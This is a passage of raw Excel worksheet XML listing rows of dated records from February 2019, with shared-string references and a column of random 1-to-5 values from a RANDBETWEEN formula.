        <v>134</v>
      </c>
      <c r="E2929" s="2" t="s">
        <v>2862</v>
      </c>
      <c r="F2929">
        <f t="shared" ca="1" si="45"/>
        <v>2</v>
      </c>
    </row>
    <row r="2930" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2930" s="1">
        <v>43503.281041666669</v>
      </c>
      <c r="B2930" t="s">
        <v>5</v>
      </c>
      <c r="C2930" t="s">
        <v>97</v>
      </c>
      <c r="E2930" s="2" t="s">
        <v>2863</v>
      </c>
      <c r="F2930">
        <f t="shared" ca="1" si="45"/>
        <v>4</v>
      </c>
    </row>
    <row r="2931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2931" s="1">
        <v>43503.27652777778</v>
      </c>
      <c r="B2931" t="s">
        <v>5</v>
      </c>
      <c r="C2931" t="s">
        <v>41</v>
      </c>
      <c r="E2931" t="s">
        <v>2864</v>
      </c>
      <c r="F2931">
        <f t="shared" ca="1" si="45"/>
        <v>2</v>
      </c>
    </row>
    <row r="2932" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2932" s="1">
        <v>43503.262835648151</v>
      </c>
      <c r="B2932" t="s">
        <v>19</v>
      </c>
      <c r="C2932" t="s">
        <v>48</v>
      </c>
      <c r="E2932" s="2" t="s">
        <v>2865</v>
      </c>
      <c r="F2932">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2933" s="1">
        <v>43503.262453703705</v>
      </c>
      <c r="B2933" t="s">
        <v>5</v>
      </c>
      <c r="C2933" t="s">
        <v>41</v>
      </c>
      <c r="E2933" t="s">
        <v>2866</v>
      </c>
      <c r="F2933">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2934" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2934" s="1">
        <v>43503.249965277777</v>
      </c>
      <c r="B2934" t="s">
        <v>5</v>
      </c>
      <c r="C2934" t="s">
        <v>71</v>
      </c>
      <c r="E2934" s="2" t="s">
        <v>2867</v>
      </c>
      <c r="F2934">
        <f t="shared" ca="1" si="45"/>
        <v>5</v>
      </c>
    </row>
    <row r="2935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2935" s="1">
        <v>43503.232222222221</v>
      </c>
      <c r="B2935" t="s">
        <v>5</v>
      </c>
      <c r="C2935" t="s">
        <v>71</v>
      </c>
      <c r="E2935" t="s">
        <v>2868</v>
      </c>
      <c r="F2935">
        <f t="shared" ca="1" si="45"/>
        <v>3</v>
      </c>
    </row>
    <row r="2936" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2936" s="1">
        <v>43503.219768518517</v>
      </c>
      <c r="B2936" t="s">
        <v>19</v>
      </c>
      <c r="C2936" t="s">
        <v>71</v>
      </c>
      <c r="E2936" s="2" t="s">
        <v>2869</v>
      </c>
      <c r="F2936">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2937" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A2937" s="1">
        <v>43503.216770833336</v>
      </c>
      <c r="B2937" t="s">
        <v>35</v>
      </c>
      <c r="C2937" t="s">
        <v>71</v>
      </c>
      <c r="E2937" s="2" t="s">
        <v>2870</v>
      </c>
      <c r="F2937">
        <f t="shared" ca="1" si="45"/>
        <v>5</v>
      </c>
    </row>
    <row r="2938" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2938" s="1">
        <v>43503.173576388886</v>
      </c>
      <c r="B2938" t="s">
        <v>13</v>
      </c>
      <c r="C2938" t="s">
        <v>48</v>
      </c>
      <c r="E2938" s="2" t="s">
        <v>2871</v>
      </c>
      <c r="F2938">
        <f t="shared" ca="1" si="45"/>
        <v>3</v>
      </c>
    </row>
    <row r="2939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2939" s="1">
        <v>43503.144328703704</v>
      </c>
      <c r="B2939" t="s">
        <v>1305</v>
      </c>
      <c r="C2939" t="s">
        <v>29</v>
      </c>
      <c r="F2939">
        <f t="shared" ca="1" si="45"/>
        <v>2</v>
      </c>
    </row>
    <row r="2940" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2940" s="1">
        <v>43503.143090277779</v>
      </c>
      <c r="B2940" t="s">
        <v>13</v>
      </c>
      <c r="C2940" t="s">
        <v>63</v>
      </c>
      <c r="E2940" s="2" t="s">
        <v>2872</v>
      </c>
      <c r="F2940">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2941" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A2941" s="1">
        <v>43503.116585648146</v>
      </c>
      <c r="B2941" t="s">
        <v>13</v>
      </c>
      <c r="C2941" t="s">
        <v>41</v>
      </c>
      <c r="E2941" s="2" t="s">
        <v>2873</v>
      </c>
      <c r="F2941">
        <f t="shared" ca="1" si="45"/>
        <v>5</v>
      </c>
    </row>
    <row r="2942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2942" s="1">
        <v>43503.106793981482</v>
      </c>
      <c r="B2942" t="s">
        <v>13</v>
      </c>
      <c r="C2942" t="s">
        <v>140</v>
      </c>
      <c r="D2942" t="s">
        <v>46</v>
      </c>
      <c r="E2942" t="s">
        <v>2874</v>
      </c>
      <c r="F2942">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2943" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2943" s="1">
        <v>43503.078923611109</v>
      </c>
      <c r="B2943" t="s">
        <v>5</v>
      </c>
      <c r="C2943" t="s">
        <v>253</v>
      </c>
      <c r="E2943" s="2" t="s">
        <v>2875</v>
      </c>
      <c r="F2943">
        <f t="shared" ca="1" si="45"/>
        <v>5</v>
      </c>
    </row>
    <row r="2944" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A2944" s="1">
        <v>43503.066365740742</v>
      </c>
      <c r="B2944" t="s">
        <v>13</v>
      </c>
      <c r="C2944" t="s">
        <v>10</v>
      </c>
      <c r="D2944" t="s">
        <v>6</v>
      </c>
      <c r="E2944" s="2" t="s">
        <v>2876</v>
      </c>
      <c r="F2944">
        <f t="shared" ca="1" si="45"/>
        <v>1</v>
      </c>
    </row>
    <row r="2945" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2945" s="1">
        <v>43503.043634259258</v>
      </c>
      <c r="B2945" t="s">
        <v>5</v>
      </c>
      <c r="C2945" t="s">
        <v>318</v>
      </c>
      <c r="E2945" s="2" t="s">
        <v>2877</v>
      </c>
      <c r="F2945">
        <f t="shared" ca="1" si="45"/>
        <v>5</v>
      </c>
    </row>
    <row r="2946" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A2946" s="1">
        <v>43503.023090277777</v>
      </c>
      <c r="B2946" t="s">
        <v>1305</v>
      </c>
      <c r="C2946" t="s">
        <v>140</v>
      </c>
      <c r="D2946" t="s">
        <v>234</v>
      </c>
      <c r="E2946" s="2" t="s">
        <v>2878</v>
      </c>
      <c r="F2946">
        <f t="shared" ref="F2946:F3009" ca="1" si="46">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="2947" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A2947" s="1">
        <v>43502.989502314813</v>
      </c>
      <c r="B2947" t="s">
        <v>5</v>
      </c>
      <c r="C2947" t="s">
        <v>41</v>
      </c>
      <c r="E2947" s="2" t="s">
        <v>2879</v>
      </c>
      <c r="F2947">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2948" s="1">
        <v>43502.970983796295</v>
      </c>
      <c r="B2948" t="s">
        <v>1305</v>
      </c>
      <c r="C2948" t="s">
        <v>41</v>
      </c>
      <c r="E2948" t="s">
        <v>2880</v>
      </c>
      <c r="F2948">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2949" s="1">
        <v>43502.927557870367</v>
      </c>
      <c r="B2949" t="s">
        <v>5</v>
      </c>
      <c r="C2949" t="s">
        <v>10</v>
      </c>
      <c r="D2949" t="s">
        <v>158</v>
      </c>
      <c r="E2949" t="s">
        <v>2881</v>
      </c>
      <c r="F2949">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2950" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2950" s="1">
        <v>43502.804189814815</v>
      </c>
      <c r="B2950" t="s">
        <v>5</v>
      </c>
      <c r="C2950" t="s">
        <v>140</v>
      </c>
      <c r="D2950" t="s">
        <v>234</v>
      </c>
      <c r="E2950" s="2" t="s">
        <v>2882</v>
      </c>
      <c r="F2950">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2951" s="1">
        <v>43502.766018518516</v>
      </c>
      <c r="B2951" t="s">
        <v>5</v>
      </c>
      <c r="C2951" t="s">
        <v>73</v>
      </c>
      <c r="E2951" t="s">
        <v>2883</v>
      </c>
      <c r="F2951">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2952" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2952" s="1">
        <v>43502.759340277778</v>
      </c>
      <c r="B2952" t="s">
        <v>13</v>
      </c>
      <c r="C2952" t="s">
        <v>140</v>
      </c>
      <c r="D2952" t="s">
        <v>234</v>
      </c>
      <c r="E2952" s="2" t="s">
        <v>2884</v>
      </c>
      <c r="F2952">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2953" s="1">
        <v>43502.757349537038</v>
      </c>
      <c r="B2953" t="s">
        <v>13</v>
      </c>
      <c r="C2953" t="s">
        <v>10</v>
      </c>
      <c r="D2953" t="s">
        <v>222</v>
      </c>
      <c r="E2953" t="s">
        <v>2885</v>
      </c>
      <c r="F2953">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2954" s="1">
        <v>43502.747013888889</v>
      </c>
      <c r="B2954" t="s">
        <v>19</v>
      </c>
      <c r="C2954" t="s">
        <v>10</v>
      </c>
      <c r="D2954" t="s">
        <v>92</v>
      </c>
      <c r="E2954" t="s">
        <v>2886</v>
      </c>
      <c r="F2954">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2955" s="1">
        <v>43502.728946759256</v>
      </c>
      <c r="B2955" t="s">
        <v>13</v>
      </c>
      <c r="C2955" t="s">
        <v>260</v>
      </c>
      <c r="E2955" t="s">
        <v>2887</v>
      </c>
      <c r="F2955">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2956" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2956" s="1">
        <v>43502.694537037038</v>
      </c>
      <c r="B2956" t="s">
        <v>5</v>
      </c>
      <c r="C2956" t="s">
        <v>6</v>
      </c>
      <c r="D2956" t="s">
        <v>194</v>
      </c>
      <c r="E2956" s="2" t="s">
        <v>2888</v>
      </c>
      <c r="F2956">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2957" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2957" s="1">
        <v>43502.688587962963</v>
      </c>
      <c r="B2957" t="s">
        <v>5</v>
      </c>
      <c r="C2957" t="s">
        <v>10</v>
      </c>
      <c r="D2957" t="s">
        <v>86</v>
      </c>
      <c r="E2957" t="s">
        <v>2889</v>
      </c>
      <c r="F2957">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2958" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2958" s="1">
        <v>43502.685520833336</v>
      </c>
      <c r="B2958" t="s">
        <v>1305</v>
      </c>
      <c r="C2958" t="s">
        <v>10</v>
      </c>
      <c r="D2958" t="s">
        <v>192</v>
      </c>
      <c r="E2958" s="2" t="s">
        <v>2890</v>
      </c>
      <c r="F2958">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2959" s="1">
        <v>43502.660405092596</v>
      </c>
      <c r="B2959" t="s">
        <v>1305</v>
      </c>
      <c r="C2959" t="s">
        <v>10</v>
      </c>
      <c r="E2959" t="s">
        <v>2891</v>
      </c>
      <c r="F2959">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2960" s="1">
        <v>43502.658159722225</v>
      </c>
      <c r="B2960" t="s">
        <v>1305</v>
      </c>
      <c r="C2960" t="s">
        <v>10</v>
      </c>
      <c r="E2960" t="s">
        <v>2892</v>
      </c>
      <c r="F2960">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2961" s="1">
        <v>43502.656469907408</v>
      </c>
      <c r="B2961" t="s">
        <v>13</v>
      </c>
      <c r="C2961" t="s">
        <v>10</v>
      </c>
      <c r="D2961" t="s">
        <v>107</v>
      </c>
      <c r="E2961" t="s">
        <v>2893</v>
      </c>
      <c r="F2961">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2962" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2962" s="1">
        <v>43502.643495370372</v>
      </c>
      <c r="B2962" t="s">
        <v>5</v>
      </c>
      <c r="C2962" t="s">
        <v>10</v>
      </c>
      <c r="D2962" t="s">
        <v>89</v>
      </c>
      <c r="E2962" s="2" t="s">
        <v>2894</v>
      </c>
      <c r="F2962">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2963" s="1">
        <v>43502.624965277777</v>
      </c>
      <c r="B2963" t="s">
        <v>19</v>
      </c>
      <c r="C2963" t="s">
        <v>10</v>
      </c>
      <c r="D2963" t="s">
        <v>6</v>
      </c>
      <c r="E2963" t="s">
        <v>2895</v>
      </c>
      <c r="F2963">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2964" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2964" s="1">
        <v>43502.623715277776</v>
      </c>
      <c r="B2964" t="s">
        <v>19</v>
      </c>
      <c r="C2964" t="s">
        <v>10</v>
      </c>
      <c r="D2964" t="s">
        <v>14</v>
      </c>
      <c r="E2964" s="2" t="s">
        <v>2896</v>
      </c>
      <c r="F2964">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2965" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2965" s="1">
        <v>43502.622013888889</v>
      </c>
      <c r="B2965" t="s">
        <v>35</v>
      </c>
      <c r="C2965" t="s">
        <v>10</v>
      </c>
      <c r="D2965" t="s">
        <v>6</v>
      </c>
      <c r="E2965" s="2" t="s">
        <v>2897</v>
      </c>
      <c r="F2965">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2966" s="1">
        <v>43502.620798611111</v>
      </c>
      <c r="B2966" t="s">
        <v>5</v>
      </c>
      <c r="C2966" t="s">
        <v>10</v>
      </c>
      <c r="D2966" t="s">
        <v>41</v>
      </c>
      <c r="E2966" t="s">
        <v>2898</v>
      </c>
      <c r="F2966">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2967" s="1">
        <v>43502.610034722224</v>
      </c>
      <c r="B2967" t="s">
        <v>13</v>
      </c>
      <c r="C2967" t="s">
        <v>10</v>
      </c>
      <c r="D2967" t="s">
        <v>112</v>
      </c>
      <c r="E2967" t="s">
        <v>2899</v>
      </c>
      <c r="F2967">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2968" s="1">
        <v>43502.609594907408</v>
      </c>
      <c r="B2968" t="s">
        <v>13</v>
      </c>
      <c r="C2968" t="s">
        <v>43</v>
      </c>
      <c r="F2968">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2969" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A2969" s="1">
        <v>43502.608819444446</v>
      </c>
      <c r="B2969" t="s">
        <v>19</v>
      </c>
      <c r="C2969" t="s">
        <v>10</v>
      </c>
      <c r="D2969" t="s">
        <v>89</v>
      </c>
      <c r="E2969" s="2" t="s">
        <v>2900</v>
      </c>
      <c r="F2969">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2970" s="1">
        <v>43502.605775462966</v>
      </c>
      <c r="B2970" t="s">
        <v>19</v>
      </c>
      <c r="C2970" t="s">
        <v>6</v>
      </c>
      <c r="D2970" t="s">
        <v>114</v>
      </c>
      <c r="E2970" t="s">
        <v>2901</v>
      </c>
      <c r="F2970">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2971" s="1">
        <v>43502.585787037038</v>
      </c>
      <c r="B2971" t="s">
        <v>19</v>
      </c>
      <c r="C2971" t="s">
        <v>10</v>
      </c>
      <c r="D2971" t="s">
        <v>89</v>
      </c>
      <c r="E2971" t="s">
        <v>2902</v>
      </c>
      <c r="F2971">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2972" s="1">
        <v>43502.573298611111</v>
      </c>
      <c r="B2972" t="s">
        <v>13</v>
      </c>
      <c r="C2972" t="s">
        <v>10</v>
      </c>
      <c r="D2972" t="s">
        <v>89</v>
      </c>
      <c r="E2972" t="s">
        <v>2903</v>
      </c>
      <c r="F2972">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2973" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2973" s="1">
        <v>43502.568993055553</v>
      </c>
      <c r="B2973" t="s">
        <v>5</v>
      </c>
      <c r="C2973" t="s">
        <v>10</v>
      </c>
      <c r="D2973" t="s">
        <v>6</v>
      </c>
      <c r="E2973" s="2" t="s">
        <v>2904</v>
      </c>
      <c r="F2973">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2974" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2974" s="1">
        <v>43502.527939814812</v>
      </c>
      <c r="B2974" t="s">
        <v>5</v>
      </c>
      <c r="C2974" t="s">
        <v>10</v>
      </c>
      <c r="D2974" t="s">
        <v>6</v>
      </c>
      <c r="E2974" t="s">
        <v>2905</v>
      </c>
      <c r="F2974">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2975" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2975" s="1">
        <v>43502.504745370374</v>
      </c>
      <c r="B2975" t="s">
        <v>5</v>
      </c>
      <c r="C2975" t="s">
        <v>71</v>
      </c>
      <c r="E2975" s="2" t="s">
        <v>2906</v>
      </c>
      <c r="F2975">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2976" s="1">
        <v>43502.483611111114</v>
      </c>
      <c r="B2976" t="s">
        <v>13</v>
      </c>
      <c r="C2976" t="s">
        <v>10</v>
      </c>
      <c r="D2976" t="s">
        <v>6</v>
      </c>
      <c r="E2976" t="s">
        <v>2907</v>
      </c>
      <c r="F2976">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2977" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A2977" s="1">
        <v>43502.47865740741</v>
      </c>
      <c r="B2977" t="s">
        <v>5</v>
      </c>
      <c r="C2977" t="s">
        <v>6</v>
      </c>
      <c r="E2977" s="2" t="s">
        <v>2908</v>
      </c>
      <c r="F2977">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2978" s="1">
        <v>43502.474861111114</v>
      </c>
      <c r="B2978" t="s">
        <v>19</v>
      </c>
      <c r="C2978" t="s">
        <v>10</v>
      </c>
      <c r="D2978" t="s">
        <v>251</v>
      </c>
      <c r="E2978" t="s">
        <v>2909</v>
      </c>
      <c r="F2978">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2979" s="1">
        <v>43502.474409722221</v>
      </c>
      <c r="B2979" t="s">
        <v>13</v>
      </c>
      <c r="C2979" t="s">
        <v>222</v>
      </c>
      <c r="E2979" t="s">
        <v>2910</v>
      </c>
      <c r="F2979">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2980" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A2980" s="1">
        <v>43502.471388888887</v>
      </c>
      <c r="B2980" t="s">
        <v>19</v>
      </c>
      <c r="C2980" t="s">
        <v>6</v>
      </c>
      <c r="D2980" t="s">
        <v>194</v>
      </c>
      <c r="E2980" s="2" t="s">
        <v>2911</v>
      </c>
      <c r="F2980">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2981" s="1">
        <v>43502.464999999997</v>
      </c>
      <c r="B2981" t="s">
        <v>19</v>
      </c>
      <c r="C2981" t="s">
        <v>10</v>
      </c>
      <c r="D2981" t="s">
        <v>36</v>
      </c>
      <c r="E2981" t="s">
        <v>2912</v>
      </c>
      <c r="F2981">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2982" s="1">
        <v>43502.457002314812</v>
      </c>
      <c r="B2982" t="s">
        <v>5</v>
      </c>
      <c r="C2982" t="s">
        <v>10</v>
      </c>
      <c r="D2982" t="s">
        <v>39</v>
      </c>
      <c r="E2982" t="s">
        <v>2913</v>
      </c>
      <c r="F2982">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2983" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A2983" s="1">
        <v>43502.448784722219</v>
      </c>
      <c r="B2983" t="s">
        <v>19</v>
      </c>
      <c r="C2983" t="s">
        <v>48</v>
      </c>
      <c r="E2983" s="2" t="s">
        <v>2914</v>
      </c>
      <c r="F2983">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2984" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A2984" s="1">
        <v>43502.447962962964</v>
      </c>
      <c r="B2984" t="s">
        <v>5</v>
      </c>
      <c r="C2984" t="s">
        <v>65</v>
      </c>
      <c r="E2984" s="2" t="s">
        <v>2915</v>
      </c>
      <c r="F2984">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2985" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A2985" s="1">
        <v>43502.443958333337</v>
      </c>
      <c r="B2985" t="s">
        <v>5</v>
      </c>
      <c r="C2985" t="s">
        <v>71</v>
      </c>
      <c r="E2985" s="2" t="s">
        <v>2916</v>
      </c>
      <c r="F2985">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2986" s="1">
        <v>43502.442094907405</v>
      </c>
      <c r="B2986" t="s">
        <v>19</v>
      </c>
      <c r="C2986" t="s">
        <v>48</v>
      </c>
      <c r="E2986" t="s">
        <v>2917</v>
      </c>
      <c r="F2986">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2987" s="1">
        <v>43502.441041666665</v>
      </c>
      <c r="B2987" t="s">
        <v>13</v>
      </c>
      <c r="C2987" t="s">
        <v>10</v>
      </c>
      <c r="D2987" t="s">
        <v>89</v>
      </c>
      <c r="E2987" t="s">
        <v>2918</v>
      </c>
      <c r="F2987">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2988" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2988" s="1">
        <v>43502.436782407407</v>
      </c>
      <c r="B2988" t="s">
        <v>19</v>
      </c>
      <c r="C2988" t="s">
        <v>10</v>
      </c>
      <c r="D2988" t="s">
        <v>36</v>
      </c>
      <c r="E2988" s="2" t="s">
        <v>2919</v>
      </c>
      <c r="F2988">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2989" s="1">
        <v>43502.423773148148</v>
      </c>
      <c r="B2989" t="s">
        <v>5</v>
      </c>
      <c r="C2989" t="s">
        <v>10</v>
      </c>
      <c r="D2989" t="s">
        <v>52</v>
      </c>
      <c r="E2989" t="s">
        <v>2920</v>
      </c>
      <c r="F2989">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2990" s="1">
        <v>43502.423321759263</v>
      </c>
      <c r="B2990" t="s">
        <v>13</v>
      </c>
      <c r="C2990" t="s">
        <v>10</v>
      </c>
      <c r="D2990" t="s">
        <v>6</v>
      </c>
      <c r="E2990" t="s">
        <v>2921</v>
      </c>
      <c r="F2990">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2991" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2991" s="1">
        <v>43502.419108796297</v>
      </c>
      <c r="B2991" t="s">
        <v>13</v>
      </c>
      <c r="C2991" t="s">
        <v>6</v>
      </c>
      <c r="D2991" t="s">
        <v>7</v>
      </c>
      <c r="E2991" s="2" t="s">
        <v>2922</v>
      </c>
      <c r="F2991">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2992" s="1">
        <v>43502.391608796293</v>
      </c>
      <c r="B2992" t="s">
        <v>13</v>
      </c>
      <c r="C2992" t="s">
        <v>10</v>
      </c>
      <c r="D2992" t="s">
        <v>89</v>
      </c>
      <c r="E2992" t="s">
        <v>2923</v>
      </c>
      <c r="F2992">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2993" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A2993" s="1">
        <v>43502.388541666667</v>
      </c>
      <c r="B2993" t="s">
        <v>19</v>
      </c>
      <c r="C2993" t="s">
        <v>48</v>
      </c>
      <c r="E2993" s="2" t="s">
        <v>2924</v>
      </c>
      <c r="F2993">
        <f t="shared" ca="1" si="46"/>
        <v>4</v>
      </c>
    </row>
    <row r="2994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2994" s="1">
        <v>43502.38622685185</v>
      </c>
      <c r="B2994" t="s">
        <v>19</v>
      </c>
      <c r="C2994" t="s">
        <v>65</v>
      </c>
      <c r="E2994" t="s">
        <v>2925</v>
      </c>
      <c r="F2994">
        <f t="shared" ca="1" si="46"/>
        <v>5</v>
      </c>
    </row>
    <row r="2995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2995" s="1">
        <v>43502.371342592596</v>
      </c>
      <c r="B2995" t="s">
        <v>5</v>
      </c>
      <c r="C2995" t="s">
        <v>41</v>
      </c>
      <c r="E2995" t="s">
        <v>2926</v>
      </c>
      <c r="F2995">
        <f t="shared" ca="1" si="46"/>
        <v>3</v>
      </c>
    </row>
    <row r="2996" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A2996" s="1">
        <v>43502.360023148147</v>
      </c>
      <c r="B2996" t="s">
        <v>19</v>
      </c>
      <c r="C2996" t="s">
        <v>65</v>
      </c>
      <c r="E2996" s="2" t="s">
        <v>2927</v>
      </c>
      <c r="F2996">
        <f t="shared" ca="1" si="46"/>
        <v>2</v>
      </c>
    </row>
    <row r="2997" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A2997" s="1">
        <v>43502.35565972222</v>
      </c>
      <c r="B2997" t="s">
        <v>5</v>
      </c>
      <c r="C2997" t="s">
        <v>253</v>
      </c>
      <c r="E2997" s="2" t="s">
        <v>2928</v>
      </c>
      <c r="F2997">
        <f t="shared" ca="1" si="46"/>
        <v>1</v>
      </c>
    </row>
    <row r="2998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2998" s="1">
        <v>43502.352175925924</v>
      </c>
      <c r="B2998" t="s">
        <v>5</v>
      </c>
      <c r="C2998" t="s">
        <v>60</v>
